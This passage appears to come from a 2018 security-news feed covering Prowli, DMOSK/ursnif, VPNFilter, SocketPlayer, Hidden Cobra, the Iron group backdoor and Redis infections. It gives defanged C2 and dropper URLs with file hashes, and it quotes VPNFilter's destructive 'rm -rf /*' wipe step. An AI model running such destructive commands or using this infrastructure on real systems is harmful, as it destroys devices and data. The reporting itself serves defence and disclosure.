Discovered by researchers at the GuardiCore security team, Operation Prowli has already hit more than 40,000 victim machines from over 9,000 businesses in various domains, including finance, education and government organisations.

Here's the list devices and services infected by the Prowli malware:
Drupal and WordPress CMS servers hosting popular websites
Joomla! servers running the K2 extension
Backup servers running HP Data Protector software
DSL modems
Servers with an open SSH port
PhpMyAdmin installations
NFS boxes
Servers with exposed SMB ports
Vulnerable Internet-of-Thing (IoT) devices
All the above targets were infected using either a known vulnerability or credential guessing.
Prowli Malware Injects Cryptocurrency Miner

Since the attackers behind the Prowli attack are abusing the infected devices and websites to mine cryptocurrency or run a script that redirects them to malicious websites, researchers believe they are more focused on making money rather than ideology or espionage.
According to GuardiCore researchers, the compromised devices were found infected with a Monero (XMR) cryptocurrency miner and the "r2r2" worm—a malware written in Golang that executes SSH brute-force attacks from the infected devices, allowing the Prowli malware to take over new devices.

In simple words, "r2r2 randomly generates IP address blocks and iteratively tries to brute force SSH logins with a user and password dictionary. Once it breaks in, it runs a series of commands on the victim," the researchers explain.
These commands are responsible for downloading multiple copies of the worm for different CPU architectures, a cryptocurrency miner and a configuration file from a remote hard-coded server.
Attackers Also Tricks Users Into Installing Malicious Extensions
Besides cryptocurrency miner, attackers are also using a well known open source webshell called "WSO Web Shell" to modify the compromised servers, eventually allowing attackers to redirect visitors of websites to fake sites distributing malicious browser extensions.
The GuardiCore team traced the campaign across several networks around the world and found the Prowli campaign associated with different industries.
"Over a period of 3 weeks, we captured dozens of such attacks per day coming from over 180 IPs from a variety of countries and organizations," the researchers said. "These attacks led us to investigate the attackers' infrastructure and discover a wide-ranging operation attacking multiple services."
How to Protect Your Devices From Prowli-like Malware Attacks
Since the attackers are using a mix of known vulnerabilities and credential guessing to compromise devices, users should make sure their systems are patched and up to date and always use strong passwords for their devices.
Moreover, users should also consider locking down systems and segmenting vulnerable or hard to secure systems, in order to separate them from the rest of their network.
Late last month, a massive botnet, dubbed VPNFilter, was found infecting half a million routers and storage devices from a wide range of manufacturers in 54 countries with a malware that has capabilities to conduct destructive cyber operations, surveillance and man-in-the-middle attacks.

DMOSK Malware Targeting Italian Companies
8.6.18 securityaffairs

The security expert and malware researcher Marco Ramilli published a detailed analysis on a new strain of malware dubbed DMOSK that targets Italian firms,
Today I’d like to share another interesting analysis made by my colleagues and I. It would be a nice and interesting analysis since it targeted many Italian and European companies. Fortunately, the attacker forgot the LOG.TXT freely available on the dropping URL letting us know the IP addresses who clicked on the first stage analyzed stage (yes, we know the companies who might be infected). Despite what we did with TaxOlolo we will not disclose the victims IP addresses and so the companies which might be infected. National CERTs have been involved and they’ve got alerted. Since we believe the threat could radically increase its magnitude in the following hours, we decided to write up this quick dirty analysis focusing on speed rather than on details. So please forgive some quick and undocumented steps.
Everything started with an email (how about that ?!). The eMail we’ve got had the following body.

Attack Path
A simple link to a drive ( drive.carlsongracieanaheim.com ) is beginning our first stage of infection. An eMail address is given as one parameter to the doc.php script which would record the IP address and the “calling” email address belonging to the victim. The script forces the browser to download a .zip file which uncompressed presents to the victim a JSE file called: scan.jse. The file is hard obfuscated. It was quite difficult to be able to decode the following stage of infection since the JavaScript was obfuscated through, at least, 3 different techniques. The following image shows the Obfuscated sample.

Second Stage: Obfuscated JSE
Unfortunately the second stage is not the final one. Indeed once de-obfuscated it we figured out that it was dropping and executing another file having the .SCR mimetype. From this stage it’s interesting to observe that only one dropping URL was called. It’s a strange behaviour, usually the attackers use multiple dropping URLs in order to get more chances to infect the victims. The found URL was the following one:
“url”: “https://drive.carlsongracieanaheim.com/x/gate.php”
The JSE file dropped the Third Stage into \User\User\AppData\Local\Temp\38781520.scr having the following hash: 77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745 which has been previously analysed by 68 AV but only 9 of them recognised as malicious generic file. The following image shows the VirusTotal analysis.

Third Stage: Executable SCR file

Unfortunately, we are still not at the end of the infection Stage. The Third stage drops and executes another payload. It does not download and execute from a different dropping website but it drops from a special and crafted memory address (fixed from .txt:0x400000). The following image shows the execution of the Fourth Stage payload directly from the victim’s memory

Fourth Stage: Dropped PE File
Following the analysis it has been possible to figure out that the final payload is something very close to ursnif which grabs victims email information and credentials. The following image shows the temporary file built before sending out information to Command and Controls servers.

Temporary File Before Sending data to Command and Control
Like any other ursnif the malware tries to reach a command and control network located both on the clear net and on the TOR network. The following section will expose the recorded IoCs.

An interesting approach that was adopted by attackers is the blacklisting. We observed at least 3 blacklists. The first one was based on victims IP. We guess (but we have not evidence on that) that the attacker would filtering responses based on Country in order to make possible a country targeted attack by blacklisting not-targeted countries. The following image shows the used temporary file to store Victim IP. The attacker could use this information in order to respond or not to a specific malware request.

Temporary File Storing IP Victim IP Address

A second black list that we found was on the dropping URL web site which was trained to do not drop files to specific IP addresses. The main reasons found to deny the dropping payload were three:
geo (Out of geographical scope). The threat is mainly focused to hit italy.
asn (internet service providers and/or cloud providers). The threat is mainly focused on clients and not on servers, so it would have no sense to give payload to cloud providers.
MIT. THe attacker does not want the dropping payload ends up to MIT folks, this is quite funny, isn’t it ?

A small section of blacklisting drop payload
The blacklists are an interesting approach to reduce the chance to be analyzed, in fact, the blacklisted IPs belong to pretty known CyberSecurity Companies (Yoroi is included) which often use specific cloud providers to run emulations and/or sandboxes.
Personal note: This is a reverse targeting attack, where the attacker wants to attack an entire set of victims but not some specific ones, so it introduces a blocking delivery of payload technique. End personal note.
Now we know how the attack works, so lets try to investigate a little bit what the attacker messed out. For example lets try to analyse the content of the Dropping URL. Quite fun to figure out the attacker let freely available his private key ! I will not disclose it …. let’s say… for respect to the attacker (? really ?)

Attacker Private Key !
While the used public certificate is the following one:

Attacker Certificate
By decoding the fake certificate the analyst would take the following information, of course, none of these information would be valuable, but make a nice shake of analysis.

Common Name: test.dmosk.local
Organization: Global Security
Organization Unit: IT Department
Locality: SPb
State: SPb
Country: RU
Valid From: June 5, 18
Valid To: June 5, 2022
Issuer: Global Security
Serial Number: 12542837396936657430 (0xae111c285fe50a16

Maybe the most “original string”, by the meaning of being written without thinking too much from the attacker, on the entire malware analysis would be the string ‘dmosk’ (in the decoded certificate), from here the Malware name.
As today we observed: 6617 email addresses that potentially could be compromised since they clicked on the First stage (evidence on dropping URL). We have evidence that many organisations have been hit by this malware able to bypass most of the known security protections since it was behind CloudFlare and with not a specific bad reputation. We decided to not disclose the “probably infected” companies. Nation Wide CERTs have been alerted (June 7 18) and together we will contact the “probably infected” companies to help them to mitigate the threat.
Please update your rules, signature and whatever you have to block the infection.
PS: the threat is quite a bit bigger than what I described, there are several additional components including APK (Android Malware), base ciphers, multi-stage obfuscators and a complete list of “probably infected” users, but again, we decided to encourage the notification speed rather than analysis details.
Hope you might find it helpful.

https:// drive[.carlsongracieanaheim[.com/doc.php
https:// drive[.carlsongracieanaheim[.com/doc1.php
https:// drive[.carlsongracieanaheim[.com/x/gate.php
https:// drive[.carlsongracieanaheim[.com/1/gate.php
C2 (tor):
https:// 4fsq3wnmms6xqybt[.onion/wpapi
https:// em2eddryi6ptkcnh[.onion/wpapi
https:// nap7zb4gtnzwmxsv[.onion/wpapi
https:// t7yz3cihrrzalznq[.onion/wpapi
https:// loop.evama.[at/wpapi
https:// torafy[.cn/wpapi
https:// u55.evama[.at/wpapi
https:// yraco[.cn/wpapi
https:// inc.robatop.[at/wpapi
https:// poi.robatop.[at/wpapi
https:// arh.mobipot.[at/wpapi
https:// bbb.mobipot.[at/wpapi
https:// takhak.[at/wpapi
https:// kerions.[at/wpapi
https:// j11.evama[.at/wpapi
https:// clocktop[.at/wpapi
https:// harent.[cn/wpapi
067b39632f093821852889b1e4bb8b2a48afd94d1e348702a608a70bb7b00e54 zip
77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745 jse
8d3d37c9139641e817bcf0fad8550d869b9f68bc689dbbf4b4d3eb2aaa3cf361 scr
1fdc0b08ad6afe61bbc2f054b205b2aab8416c48d87f2dcebb2073a8d92caf8d exe
afd98dde72881d6716270eb13b3fdad2d2863db110fc2b314424b88d85cd8e79 exe

VPNFilter Targets More Devices Than Initially Thought
7.6.18 securityweek

Researchers continue to analyze the VPNFilter attack and they have discovered new capabilities and determined that the threat targets a larger number of devices than initially believed.

Cisco Talos’ initial report on VPNFilter said the threat targeted 16 routers and network-attached storage (NAS) devices from Linksys, MikroTik, Netgear, TP-Link and QNAP. It turns out that not only is the malware capable of hacking more device models from these vendors, it can also take control of products from ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.

Talos now lists a total of more than 50 impacted devices. While researchers have identified a sample targeting UPVEL products, they have not been able to determine exactly which models are affected.

Experts have also found a new stage 3 endpoint exploitation module that injects malicious content into traffic as it passes through a compromised network device.

The new module, dubbed “ssler,” provides data exfiltration and JavaScript injection capabilities by intercepting traffic going to port 80. Attackers can control which websites are targeted and where the stolen data is stored.

“With this new finding, we can confirm that the threat goes beyond what the actor could do on the network device itself, and extends the threat into the networks that a compromised network device supports,” Talos explained.

Another new stage 3 module discovered after the initial analysis, dubbed “distr,” allows stage 2 modules to remove the malware from a device and then make that device unusable.

One interesting capability of VPNFilter is to monitor the network for communications over the Modbus SCADA protocol. Talos has conducted further analysis of this sniffer and published additional details.

When it was discovered, the VPNFilter botnet had ensnared roughly 500,000 devices across 54 countries. However, experts believe the main target is Ukraine and, along with U.S. authorities, attributed the threat to Russia, specifically the group known as Sofacy, with possible involvement of the actor tracked as Sandworm.

The FBI has managed to disrupt the botnet by seizing one of its domains, but researchers noticed that the attackers have not given up and continue to target routers in Ukraine.

Backdoor Uses Socket.io for Bi-directional Communication
7.6.18 securityweek

A recently discovered remote access Trojan is using a specialized program library that allows operators to interact with the infected machines directly, without an initial “beacon” message, G Data reports.

Dubbed SocketPlayer, the backdoor stands out because it doesn’t use the typical one-way communication system that most banking Trojans, backdoors, and keyloggers use. Instead, it employs the socket.io library, which enables real-time, bi-directional communication between applications.

Because of this feature, the malware handler no longer has to wait for the infected machine to initiate communication, and the malware operator can contact the compromised computer on their own.

G Data security researchers observed two variants of SocketPlayer in the wild, one acting as a downloader capable of executing arbitrary code from a website, while the other featuring more complex capabilities, including detection and sandbox evasion mechanisms.

Once it has been installed on a compromised machine, the malware waits for commands from the operator, and can perform a variety of actions, such as sniffing through drives, screenshot recording, fetching and running code, and more.

The researchers also discovered that other functions are also selectable, though they do not appear to have been implemented yet. One of them, for example, appears to have been intended as a keylogger, though no actual keylogging functionality is present in the backdoor.

The observed malware sample was being distributed through an Indian website, but it’s unclear how the backdoor spreads. Regardless of whether the website was used for infection purposes or only as a mirror, the malicious file remained unnoticed on it for a long time.

The first variant of SocketPlayer was first submitted to VirusTotal on March 28, with a second sample submitted on March 31, G Data explains in a technical report (PDF).

The infection routine starts with the downloader checking if it runs in a sandboxed environment. If it doesn’t, it fetches an executable file, decrypts it, and uses the Invoke method to run it in memory.

The invoked program creates a socket connection to the host hxxp://, as well as a registry key to achieve persistence. It also checks if a Process Handler/ folder exists and creates it if it doesn’t. Next, the program creates an autostart key with the value “Handler.”

It also downloads another executable, which in turn downloads SocketPlayer, decrypts it, and runs it in memory.

The security researchers also noticed that the two variants of the backdoor went through a series of changes between samples, such as the use of a new command and control port, new file locations, different information sent in the initial routine, new commands added to the server, and new functionality included in the malware.

FBI issues alert over two new malware linked to Hidden Cobra hackers
7.6.18 thehackernews 

The US-CERT has released a joint technical alert from the DHS and the FBI, warning about two newly identified malware being used by the prolific North Korean APT hacking group known as Hidden Cobra.
Hidden Cobra, often known as Lazarus Group and Guardians of Peace, is believed to be backed by the North Korean government and known to launch attacks against media organizations, aerospace, financial and critical infrastructure sectors across the world.
The group was even associated with the WannaCry ransomware menace that last year shut down hospitals and businesses worldwide. It is reportedly also linked to the 2014 Sony Pictures hack, as well as the SWIFT Banking attack in 2016.
Now, the Department of Homeland Security (DHS) and the FBI have uncovered two new pieces of malware that Hidden Cobra has been using since at least 2009 to target companies working in the media, aerospace, financial, and critical infrastructure sectors across the world.
The malware Hidden Cobra is using are—Remote Access Trojan (RAT) known as Joanap and Server Message Block (SMB) worm called Brambul. Let's get into the details of both the malware one by one.
Joanap—A Remote Access Trojan
According to the US-CERT alert, "fully functional RAT" Joanap is a two-stage malware that establishes peer-to-peer communications and manages botnets designed to enable other malicious operations.
The malware typically infects a system as a file delivered by other malware, which users unknowingly download either when they visit websites compromised by the Hidden Cobra actors, or when they open malicious email attachments.
Joanap receives commands from a remote command and control server controlled by the Hidden Cobra actors, giving them the ability to steal data, install and run more malware, and initialize proxy communications on a compromised Windows device.
Other functionalities of Joanap include file management, process management, creation and deletion of directories, botnet management, and node management.
During analysis of the Joanap infrastructure, the U.S. government has found the malware on 87 compromised network nodes in 17 countries including Brazil, China, Spain, Taiwan, Sweden, India, and Iran.
Brambul—An SMB Worm
Brambul is a brute-force authentication worm that like the devastating WannaCry ransomware, abuses the Server Message Block (SMB) protocol in order to spread itself to other systems.
The malicious Windows 32-bit SMB worm functions as a service dynamic link library file or a portable executable file often dropped and installed onto victims' networks by dropper malware.
"When executed, the malware attempts to establish contact with victim systems and IP addresses on victims' local subnets," the alert notes.
"If successful, the application attempts to gain unauthorized access via the SMB protocol (ports 139 and 445) by launching brute-force password attacks using a list of embedded passwords. Additionally, the malware generates random IP addresses for further attacks."
Once Brambul gains unauthorized access to the infected system, the malware communicates information about victim's systems to the Hidden Cobra hackers using email. The information includes the IP address and hostname—as well as the username and password—of each victim's system.
The hackers can then use this stolen information to remotely access the compromised system via the SMB protocol. The actors can even generate and execute what analysts call a "suicide script."
DHS and FBI have also provided downloadable lists of IP addresses with which the Hidden Cobra malware communicates and other IOCs, to help you block them and enable network defenses to reduce exposure to any malicious cyber activity by the North Korean government.
DHS also recommended users and administrators to use best practices as preventive measures to protect their computer networks, like keeping their software and system up to date, running Antivirus software, turning off SMB, forbidding unknown executables and software applications.
Last year, the DHS and the FBI published an alert describing Hidden Cobra malware, called Delta Charlie—a DDoS tool which they believed North Korea uses to launch distributed denial-of-service (DDoS) attacks against its targets.
Other malware linked to Hidden Cobra in the past include Destover, Wild Positron or Duuzer, and Hangman with sophisticated capabilities, like DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware.

VPNFilter malware now targets new devices, even behind a firewall
7.6.18 securityaffairs 

The VPNFilter botnet now targeting new devices from other vendors, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.
The VPNFilter botnet is worse than initially thought, according to a new report published by Cisco Talos Intelligence group, the malicious code is now targeting ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE

“First, we have determined that additional devices are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.” reads a new analysis published by Talos team.

“New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Link. Our research currently shows that no Cisco network devices are affected.”

VPNFilter bot is now able to target endpoints behind the firewall and other network devices using a new stage 3 module that injects malicious content into web traffic

The recently discovered module dubbed “ssler” could be exploited by attackers to deliver exploits to endpoints via a man-in-the-middle capability (e.g. they can intercept network traffic and inject malicious code into it without the user’s knowledge).

“The ssler module, which we pronounce as “Esler,” provides data exfiltration and JavaScript injection capabilities by intercepting all traffic passing through the device destined for port 80. This module is expected to be executed with a parameter list, which determines the module’s behavior and which websites should be targeted.” continues the analysis.

VPNFilter initially infected over 500,000 routers and NAS devices, most of them in Ukraine, but fortunately, a prompt action of authorities allowed to take down it.

A week ago, experts from security firms GreyNoise Intelligence and JASK announced that the threat actor behind the VPNFilter is now attempting to resume the botnet with a new wave of infections.

Talos researchers confirmed that more devices from Linksys, MikroTik, Netgear, and TP-Link are affected, this means that the botnet could rapidly grow to infect new consumer or SOHO devices.

Talos already notified the attacks to the vendors, most of them promptly started working on new firmware to address the issue.

VPNFilter malware

According to experts at Juniper Networks, the VPNFilter bot doesn’t exploit a zero-day vulnerability.

“The initial list of targeted routers included MicroTik, Linksys, NetGear, and TPLink. It is now expanded to include devices from ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE.” reads a post published by Juniper Network.

“We still do not believe this list is complete as more infected devices are being discovered. There is still no sign of any zero day vulnerability being exploited, so it is likely that known vulnerabilities and weak passwords are the main vector of infection.”

The new attacks observed by Talos leverage compromised SOHO routers to inject content into web traffic using the ssler module.

The experts noticed that one of the parameters provided to the module it the source IP, a circumstance that suggests attackers might be profiling endpoints to pick out the best targets. The module is also able to monitor destination IP, likely to choose profitable targets, such as connection to a bank, or connections on which are credentials and other sensitive data are in transit.

The experts also provided further details on the device destruction module ‘dstr’ that attackers could use to render an infected device inoperable.

The dstr module is able to delete files necessary for normal operation of the infected device, it also deletes all files and folders related to its own operation to hide its presence to a forensic analysis.

“The dstr module clears flash memory by overwriting the bytes of all available /dev/mtdX devices with a 0xFF byte. Finally, the shell command rm -rf /* is executed to delete the remainder of the file system and the device is rebooted. At this point, the device will not have any of the files it needs to operate and fail to boot.” continues the analysis.

The following table published by El Reg shows all devices targeted by the VPNFilter bot, new ones are marked with an asterisk.

ASUS RT-AC66U*; RT-N10 series*, RT-N56 series*
D-Link DES-1210-08P*; DIR-300 Series*; DSR-250, 500, and 1000 series*
Huawei HG8245*
Linksys E1200; E1500; E3000*; E3200*; E4200*; RV082*; WRVS4400N
Microtik CCR1009*; CCR1x series; CRS series*; RB series*; STX5*
Netgear DG834*; DGN series*; FVS318N*; MBRN3000*; R-series; WNR series*; WND series*; UTM50*
QNAP TS251; TS439 Pro; other devices running QTS software
TP-Link R600VPN; TL-WR series*
Ubiquiti NSM2*; PBE M5*
UPVEL Unknown devices
Further technical details are available in the report published by Talos.

VPNFilter Continues Targeting Routers in Ukraine
6.6.18 securityweek

Despite their infrastructure being disrupted, the hackers behind the VPNFilter botnet continue targeting routers located in Ukraine, which is believed to be the campaign’s primary target.

When Cisco Talos brought the existence of VPNFilter to light last month, the botnet had ensnared at least 500,000 routers and network-attached storage (NAS) devices across 54 countries.

The malware can intercept data passing through the compromised device, it can monitor the network for communications over the Modbus SCADA protocol, and also has destructive capabilities that can be leveraged to make an infected device unusable.

During the first stage of the infection process, once it completed initialization, the malware attempted to obtain an IP address from images hosted on the Photobucket service. If that failed, it would try to acquire the IP from an image hosted on a backup domain, toknowall.com. That IP pointed to a server hosting the stage 2 payload.

Photobucket has closed the accounts used in the attack and the FBI has managed to take control of the toknowall.com domain, thus disrupting the operation.

However, VPNFilter is designed to open a listener and wait for a specific trigger packet if the backup domain fails as well. This allows the attacker to still provide the IP for the stage 2 component.

While it’s unclear exactly what else the FBI and cybersecurity firms did to disrupt the botnet, researchers at Jask and GreyNoise Intelligence noticed that VPNFilter has continued to target routers even after Talos published its report and the toknowall.com domain was seized.

Experts have observed some IPs scanning port 2000 for vulnerable MikroTik routers located exclusively in Ukraine. The source IPs have been traced to countries such as Russia, Brazil, the United States, and Switzerland.

“Activity like this raises some interesting questions about indications of ongoing Ukraine targeted campaigns, a likely subject for future research,” Jask wrote in a blog post.

The VPNFilter attack was allegedly launched by Russia – specifically the group known as Sofacy, APT28, Pawn Storm, Fancy Bear, and Sednit – and the main target is believed to be Ukraine. Some links have also been found between the VPNFilter malware and BlackEnergy, which has been used by a different Russia-linked threat actor known as Sandworm. The FBI has viewed Sofacy and Sandworm as the same group when it attributed VPNFilter to Russia.

The VPNFilter malware has been observed targeting devices from Linksys, MikroTik, Netgear, TP-Link and QNAP. All of these vendors have published advisories to warn their customers about the threat.

The FBI has advised users to reboot their routers to temporarily disrupt the malware. While rebooting a router is typically enough to remove a piece of malware, VPNFilter has a clever persistence mechanism that helps its stage 1 component survive a reboot of the device.

New Backdoor Based on HackingTeam’s Surveillance Tool
6.6.18 securityweek

A recently discovered backdoor built by the Iron cybercrime group is based on the leaked source code of Remote Control System (RCS), HackingTeam’s infamous surveillance tool, security firm Intezer reports.

The Iron group is known for the Iron ransomware (which a rip-off Maktub malware) and is believed to have been active for around 18 months.

During this time, the cybercriminals built various malware families, including backdoors, crypto-miners, and ransomware, and targeted Windows, Linux, and Android devices. To date, the group is believed to have infected at least a few thousand victims.

Their new backdoor, the security researchers say, was first observed in April this year and features an installer protected with VMProtect and compressed using UPX.

During installation, it checks if it runs in a virtual machine, drops and installs a malicious Chrome extension, creates a scheduled task, creates a mutex to ensure only one instance of itself is running, drops the backdoor in the Temp folder, then checks OS version and launches the backdoor based on the platform iteration.

The malware also checks if Qhioo360 products are present on the systems and only proceeds if none is found. It also installs a malicious certificate to sign the backdoor binary as root CA, then creates a service pointing back to the backdoor.

Part of the backdoor’s code is based on HackingTeam’s leaked RCS source code, the researchers say. Specifically, the cybercriminals used two main functions in their IronStealer and Iron ransomware families.

These include a virtual machine detection code taken directly from HackingTeam’s “Soldier” implant (which targets Cuckoo Sandbox, VMware products, and Oracle’s VirtualBox) and the DynamicCall module from HackingTeam’s “core” library (dynamically calls external library function by obfuscating the function name, thus making static analysis more difficult).

The malicious Chrome extension dropped by the malware is a patched version of Adblock Plus, which injects an in-browser crypto-mining module (based on CryptoNoter) and an in-browser payment hijacking module.

The extension constantly runs in the background, as a stealth host based crypto-miner. Every minute, the malware checks if Chrome is running, and can silently launch it if it doesn’t.

The backdoor also embeds Adblock Plus for IE, also modified similarly to the Chrome extension and capable of injecting remote JavaScript. This functionality, however, is no longer automatically used, the researchers discovered.

If Qhioo360 Safe Guard or Internet Security are found on the system, the malware runs once, without persistence. Otherwise, it installs the aforementioned rogue, hardcoded root CA certificate to make the backdoor binary seem legitimate.

The malware would decrypt a shellcode that loads Cobalt Strike beacon in-memory, and fetches a payload URL from a hardcoded Pastebin paste address.

Two different payloads were dropped by the malware, namely Xagent, a variant of “JbossMiner Mining Worm,” and the Iron ransomware, which started being dropped only recently.

The Iron backdoor drops the latest voidtool Everything search utility and silently installs it to use it for finding files likely containing cryptocurrency wallets (it targets around 20 wallets).

“IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account,” the researchers explain.

Iron cybercrime group uses a new Backdoor based on HackingTeam’s RCS surveillance sw
6.6.18 securityaffairs

Security experts at security firm Intezer have recently discovered backdoor, associated with the operation of the Iron cybercrime group, that is based on the leaked source code of Remote Control System (RCS).
The Remote Control System (RCS) is the surveillance software developed by the HackingTeam, it was considered a powerful malware that is able to infect also mobile devices for covert surveillance. RCS is able to intercept encrypted communication, including emails and VOIP voice calls (e.g. Skype), the mobile version, available for all the OSs (Apple, Android, Symbian, and Blackberry), is also able to completely control the handset and its components, including the camera, the microphone and GPS module.

The Iron cybercrime group has been active since at least 2016, is known for the Iron ransomware but across the years it is built various strain of malware, including backdoors, cryptocurrency miners, and ransomware to target both mobile and desktop systems.

“In April 18, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer.

“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”

Thousands of victims have been infected by malware used by the crime gang.

The new backdoor analyzed by the experts uses an installer protected with VMProtect and compressed using UPX, the malicious code is able to determine if it is running in a virtual machine.

The malware first drops and installs a malicious Chrome extension, creates a scheduled task, creates a mutex to ensure only one instance of itself is running, drops the backdoor dll to %localappdata%\Temp\\<random>.dat, then checks OS version to determine the backdoor to launch.

The malware halts its execution if detect the presence of Qhioo360 products. It also installs a malicious certificate to sign the backdoor binary as root CA, then creates a service pointing back to the backdoor.

The analysis of the backdoor revealed it uses two main functions in their IronStealer and Iron ransomware families, the VM detection code that was borrowed from the HackingTeam’s “Soldier” implant and the DynamicCall module from HackingTeam’s “core” library.

iron cybercrime group backdoor extension

The malware used a patched version of the popular Adblock Plus chrome extension to inject both the in-browser crypto-mining module (based on CryptoNoter) and the in-browser payment hijacking module.

The extension constantly runs in the background, as a stealth host based crypto-miner. Every minute, the malware checks if Chrome is running, and can silently launch it if it doesn’t.

“The malicious extension is not only loaded once the user opens the browser, but also constantly runs in the background, acting as a stealth host based crypto-miner. The malware sets up a scheduled task that checks if chrome is already running, every minute, if it isn’t, it will “silent-launch” it” continues the analysis.

The backdoor also includes Adblock Plus for IE that is capable of injecting remote JavaScript, a functionality, however, is no longer automatically used.

The malware automatically decrypts a hard coded shellcode that loads Cobalt Strike beacon in-memory, and fetches a payload URL from a hardcoded Pastebin address.

The malicious code is able to drop two malware. a variant of “JbossMiner Mining Worm” tracked as Xagent and the Iron ransomware.

The group used the malware to stealing cryptocurrency from the victim’s workstation, the Iron backdoor drops the latest voidtool Everything search utility and silently installs it to use it for finding files likely containing cryptocurrency wallets.

“IronStealer constantly monitors the user’s clipboard for Bitcoin, Monero & Ethereum wallet address regex patterns. Once matched, it will automatically replace it with the attacker’s wallet address so the victim would unknowingly transfer money to the attacker’s account,” explained the experts.

Further details, including the IoCs are reported in the blog post published by the researchers.

Imperva’s research shows 75% of open Redis servers are infected
3.6.18 securityaffairs

According to the security experts at Imperva firm, three open Redis servers out of four are infected with malware.
The discovery is the result of analysis conducted by running Redis-based honeypot servers for some months.

Since their initial report on the RedisWannaMine attack that propagates through open Redis and Windows servers, the experts from Imperva have discovered a new wave of attacks against Redis servers exposed online without authentication.

One of the most common attacks against Redis servers consists of adding SSH keys, so the attacker can remotely access the machine and take it over.

“Having let our honeypot collect data for some time, we noticed that different attackers use the same keys and/ or values to carry out attacks.” states the report published by the experts.

“As such, a shared key or value between multiple servers is a clear sign of a malicious botnet activity.”

The experts used the SSH keys they’ve collected through their honeypot to scan Redis servers that were left exposed online for the presence of these keys.

The experts obtained a list of over 72,000 Redis servers available online by using the shodan query ‘port:6379,’ over 10,000 of these responded to its scan request without an error, allowing researchers to determine locally installed SSH keys.

Redis servers scans

The discovery was disconcerting, over 75% of these Redis servers were using an SSH key associated with a botnet.

“Unsurprisingly, more than two-thirds of the open Redis servers contain malicious keys and three-quarters of the servers contain malicious values, suggesting that the server is infected.” continues the report.

“Also according to our honeypot data, the infected servers with “backup” keys were attacked from a medium-sized botnet ( ) located at China (86% of IPs).”

Imperva revealed that its customers were attacked more than 75k times, by 295 IPs that run publicly available Redis servers, this means that threat actors are exploiting vulnerable installs to compose their botnet and power a broad range of attacks (SQL injection, cross-site scripting, malicious file uploads, remote code executions, etc).

The “crackit” SSH key in the above table is known to be used at least since 2016 by a known threat actor to spread ransomware and to blackmail the owners of the compromised servers.

The main problem with Redis servers is that owners ignore that Redis doesn’t use a secure configuration by default because they are designed to operate in closed IT networks.

Before some recommendation to the admins operating Redis servers:

Make sure you follow Redis Security notes, i.e.
Don’t expose your Redis to the internet
If possible, apply authentication
Don’t store sensitive data in clear text
Monitor your Redis server to make sure it is not infected.
You can monitor processes or CPU consumption to check if a crypto mining malware is running. You can also use the keys and values mentioned in the tables above to monitor the data stored in your Redis server.
Make sure you run Redis with the minimal privileges necessary. Running it with root user, for example, is a bad practice, since it greatly increases the potential damage that an attacker can cause.

Trojan watch

1.6.18 Kaspersky Virus
The cyberphysical risks of wearable gadgets
We continue to research how proliferation of IoT devices affects the daily lives of users and their information security. In our previous study, we touched upon ways of intercepting authentication data using single-board microcomputers. This time, we turned out attention to wearable devices: smartwatches and fitness trackers. Or more precisely, the accelerometers and gyroscopes inside them.

From the hoo-ha surrounding Strava, we already know that even impersonal data on user physical activity can make public what should be non-public information. But at the individual level, the risks are far worse: these smart devices are able to track the moments you’re entering a PIN code in an ATM, signing into a service, or unlocking a smartphone.

In our study, we examined how analyzing signals within wearable devices creates opportunities for potential intruders. The findings were less than encouraging: although looking at the signals from embedded sensors we investigated cannot (yet) emulate “traditional” keyloggers, this can be used to build a behavioral profile of users and detect the entry of critical data. Such profiling can happen discreetly using legitimate apps that run directly on the device itself. This broadens the capacity for cybercriminals to penetrate victims’ privacy and facilitates access to the corporate network of the company where they work.

So, first things first.

Behavioral profiling of users
When people hear the phrase ‘smart wearables’, they most probably think of miniature digital gadgets. However, it is important to understand that most smartwatches are cyberphysical systems, since they are equipped with sensors to measure acceleration (accelerometers) and rotation (gyroscopes). These are inexpensive miniature microcircuits that frequently contain magnetic field sensors (magnetometers) as well. What can be discovered about the user if the signals from these sensors are continuously logged? More than the owner of the gadget would like.

For the purpose of our study, we wrote a fairly simple app based on Google’s reference code and carried out some neat experiments with the Huawei Watch (first generation), Kingwear KW88, and PYiALCY X200 smartwatches based on the Android Wear 2.5 and Android 5.1 for Smartwatch operating systems. These watches were chosen for their availability and the simplicity of writing apps for them (we assume that exploiting the embedded gyroscope and accelerometer in iOS would follow a similar path).

Logging smartwatch signals during password entry

To determine the optimal sampling frequency of the sensors, we conducted a series of tests with different devices, starting with low-power models (in terms of processor) such as the Arduino 101 and Xiaomi Mi Band 2. However, the sensor sampling and data transfer rates were unsatisfactory — to obtain cross-correlation values that were more or less satisfactory required a sampling frequency of at least 50 Hz. We also rejected sampling rates greater than 100 Hz: 8 Kbytes of data per second might not be that much, but not for hours-long logs. As a result, our app sampled the embedded sensors with a frequency of 100 Hz and logged the instantaneous values of the accelerometer and gyroscope readings along three axes (x, y, z) in the phone’s memory.

Admittedly, getting a “digital snapshot” of a whole day isn’t that easy, because the Huawei watch’s battery life in this mode is no more than six hours.

But let’s take a look at the accelerometer readings for this period. The vertical axis shows the acceleration in m/s2, and the horizontal the number of samples (each corresponds to 10 milliseconds on average). For a complete picture, the accelerometer and gyroscope readings are presented in the graphs below.

Digital profile of a user recorded in one hour. Top — accelerometer signals, bottom — gyroscope signals

The graphs contains five areas in which different patterns are clearly visible. For those versed in kinematics, this graph tells a lot about the user.

The most obvious motion pattern is walking. We’ll start with that.

